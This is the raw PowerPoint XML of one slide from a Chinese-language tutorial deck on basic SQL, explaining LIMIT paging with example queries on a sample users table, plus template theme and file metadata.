            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326874" y="1280535"/>
            <a:ext cx="2816797" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>分页查询（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>LIMIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{506A9063-63A2-47AD-8125-A799B95F7095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839496" y="2011225"/>
            <a:ext cx="5822646" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询语句 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> offset size</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A158C39-B726-4DB1-8A64-609BF4A18408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8525013" y="960469"/>
            <a:ext cx="1028578" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F52E157B-EA8C-4D19-962F-2D25FAC60A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809354" y="5420229"/>
            <a:ext cx="4100803" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  * from users limit 1,1;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="28" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07EA76D8-58F9-4B6F-AF2A-79B82399A675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7054791" y="1456745"/>
          <a:ext cx="4166695" cy="2315448"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="555505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217910847"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289602206"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2781414587"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>passwd</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2334648633"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Admin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2527666147"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Bob</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>123</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="656364240"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>user1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>pass1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2831422024"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B6A3ECB-F490-4F5D-8765-21F7D36F9507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064928" y="4393058"/>
            <a:ext cx="653013" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{336CE6B7-0522-4AAB-8032-B62443BE134B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1837506" y="3600264"/>
            <a:ext cx="4279515" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>限定查询结果返回的数量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E40B074-BDEA-4751-8498-1778633A5B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064928" y="3101564"/>
            <a:ext cx="997017" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>效果：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD28FFB6-7A62-4843-8086-C0EB842E0067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="1683034"/>
            <a:ext cx="997017" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>格式：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{187E9073-F662-4881-A992-1641CE04881E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809355" y="2446843"/>
            <a:ext cx="4870515" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代表的是起始的条目索引，默认从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开始</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{405B5C8A-962C-4956-89F5-F6690A9F3CA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809354" y="2797080"/>
            <a:ext cx="4870515" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代表的是显示的条目数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本框 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D46E101D-1831-43A3-965A-4CDD948E4CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1717941" y="4749686"/>
            <a:ext cx="3844322" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  * from users limit 1;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1401721502"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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heme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="第一PPT，www.1ppt.com">
  <a:themeElements>
    <a:clrScheme name="自定义 2">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79646"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="F79646"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="kqzetcpu">
      <a:majorFont>
        <a:latin typeface=""/>
        <a:ea typeface="微软雅黑"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface=""/>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6852</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>687</Paragraphs>
  <Slides>56</Slides>
  <Notes>56</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56</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="68" baseType="lpstr">
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>PingFangSC-Regular</vt:lpstr>
      <vt:lpstr>SourceSansPro</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Verdana</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商务</dc:title>
  <dc:creator>第一PPT</dc:creator>
  <cp:keywords>www.1ppt.com</cp:keywords>
  <dc:description>www.1ppt.com</dc:description>
  <cp:lastModifiedBy>Dragon Silence</cp:lastModifiedBy>
  <cp:revision>337</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-18T03:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-10T04:41:15Z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2052-10.1.0.6748</vt:lpwstr>
  </property>
</Properties>
</file>